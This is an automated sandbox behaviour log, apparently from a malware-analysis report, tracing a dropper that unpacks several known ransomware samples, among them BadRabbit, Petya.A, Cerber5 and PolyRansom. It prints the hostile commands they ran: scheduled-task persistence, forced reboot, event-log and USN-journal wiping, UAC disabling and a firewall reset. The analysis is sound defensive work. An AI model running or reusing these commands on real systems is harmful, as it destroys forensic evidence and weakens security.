        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe "C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\DCD7.tmp "C:\Windows\DCD7.tmp" \\.\pipe\{2E02CEAC-C329-41B6-9CE1-D678AB93A9A0}
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall reset
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\DCD7.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe"
        Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C Start "" "C:\Windows\dispci.exe" -id 189355826 && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 189355826
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogon
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe"
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe"
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Users\user\yeYUggIg\rCUUIQEQ.exe C:\Users\user\yeYUggIg\rCUUIQEQ.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\ProgramData\sWAsokQQ\wKAwMsck.exe C:\ProgramData\sWAsokQQ\wKAwMsck.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nKgYAAYU.bat" "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe""
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe "C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe "C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe "C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe "C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe "C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe "C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe "C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe "C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe "C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe" Jump to behavior
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeProcess created: C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe "C:\Users\user\AppData\Local\Temp\dgr2nom5.kbb\Endermanch@WinlockerVB6Blacksod.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\DCD7.tmp "C:\Windows\DCD7.tmp" \\.\pipe\{2E02CEAC-C329-41B6-9CE1-D678AB93A9A0}Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN drogonJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall set allprofiles state onJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\system32\netsh.exe advfirewall resetJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "E" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegalJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 189355826 && exit"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 15:03:00
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\dispci.exe "C:\Windows\dispci.exe" -id 189355826
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Setup
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl System
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Security
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wevtutil.exe wevtutil cl Application
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\fsutil.exe fsutil usn deletejournal /D C:
        Source: C:\Windows\dispci.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN drogon
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "E"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 1 127.0.0.1
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Users\user\yeYUggIg\rCUUIQEQ.exe C:\Users\user\yeYUggIg\rCUUIQEQ.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\ProgramData\sWAsokQQ\wKAwMsck.exe C:\ProgramData\sWAsokQQ\wKAwMsck.exe
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom"
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nKgYAAYU.bat" "C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exe C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A47CC5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,4_2_04A47CC5
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;E&quot;)
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeFile created: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1lJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_00409E5A GetDiskFreeSpaceA,3_2_00409E5A
        Source: Error file remover.msi.53.drBinary or memory string: INSERT INTO `` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYComboBoxListBoxSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'DELETE FROM `%s` WHERE `Property`='%s' [1]SELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1;WS_EX_LAYOUTRTLWS_EX_NOINHERITLAYOUTWS_EX_NOACTIVATEWS_EX_LAYEREDWS_EX_RIGHTWS_EX_RIGHTSCROLLBARWS_EX_WINDOWEDGEWS_EX_TRANSPARENTWS_EX_TOPMOSTWS_EX_TOOLWINDOWWS_EX_STATICEDGEWS_EX_RTLREADINGWS_EX_PALETTEWINDOWWS_EX_OVERLAPPEDWINDOWWS_EX_NOPARENTNOTIFYWS_EX_MDICHILDWS_EX_LTRREADINGWS_EX_LEFTSCROLLBARWS_EX_LEFTWS_EX_DLGMODALFRAMEWS_EX_CONTROLPARENTWS_EX_CONTEXTHELPWS_EX_CLIENTEDGEWS_EX_APPWINDOWWS_EX_ACCEPTFILESWS_TILEDWS_TILEDWINDOWWS_POPUPWS_POPUPWINDOWWS_OVERLAPPEDWS_OVERLAPPEDWINDOWWS_MINIMIZEWS_MINIMIZEBOXWS_MAXIMIZEWS_MAXIMIZEBOXWS_VSCROLLWS_VISIBLEWS_THICKFRAMEWS_TABSTOPWS_SYSMENUWS_SIZEBOXWS_ICONICWS_HSCROLLWS_GROUPWS_DLGFRAMEWS_DISABLEDWS_CLIPSIBLINGSWS_CLIPCHILDRENWS_CHILDWINDOWWS_CHILDWS_CAPTIONWS_BORDERWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSGetProcessIdKernel32.dllMsiLogFileLocationrunasRunAsAdminFileRunAsAdminCmdRunAsAdminWorkingDir[AdminToolsFolder][TemplateFolder][StartupFolder][DesktopFolder][ProgramMenuFolder][WindowsVolume][SystemFolder][LocalAppDataFolder][WindowsFolder][AI_ProgramFiles][CommonFiles64Folder][LocalAppDataFolder]Programs\Common\[CommonFilesFolder][ProgramFiles64Folder][LocalAppDataFolder]Programs\[ProgramFilesFolder]MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ProgramMenuFolderAI_SH_INITEDSELECT `Action`,`Target` FROM `CustomAction`SET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRAI_InstallPerUser = "0"ALLUSERS = "2"MSIINSTALLPERUSER = "1"1ALLUSERSVersionMsi >= "5.0"2AI_InstallPerUser = "1"MSIINSTALLPERUSERMSINEWINSTANCEProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoOLDPRODUCTSLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0|AI_STARTMENU_SHAI_QUICKLAUNCH_SHAI_STARTUP_SHAI_SHORTCUTSREGNot InstalledDesktopFolderQuickLaunch_DirStartupFolderAI_SH_DIRProductName*.*Riched20.dll -user -machine -quiet -addgroup All_CodeMy_Computer_Zone -url "*" Nothing -name "" -addgroup " FullTrust -remgroup "SELECT `Component` FROM `Component`AI_ARP_SIZEARPPRODUCTICONWindowsFolderProductCodeAppDataFolderInstaller\ARP_ICON_PATHMicrosoftAI_BIND_TCP_HOSTAI_SEARCH_TCP_PORTSockErrorAI_PORT_TEST_RESFreePortAI_BIND_TCP_PORTUsedPortAI_FREE_DISK_SPACE&,WarningAI_MESSAGEBOX_TEXTMB_ABORTRETRYIG
        Source: 4W5dQXszUV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\4W5dQXszUV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A484EE CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,4_2_04A484EE
        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeMutant created: \Sessions\1\BaseNamedObjects\wCcQMkco
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5516:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeMutant created: \Sessions\1\BaseNamedObjects\shell.ipc.{18192125-9B0C-B8CE-4A82-18564590BB6A}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1388:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
        Source: C:\Users\user\AppData\Local\Temp\kk131kcj.s1p\Endermanch@PolyRansom.exeMutant created: \Sessions\1\BaseNamedObjects\VskYEwwo
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2236:120:WilError_01
        Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\82577E283AD6FDE5
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4316:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9436:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9392:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5556:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4184:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:10500:120:WilError_01
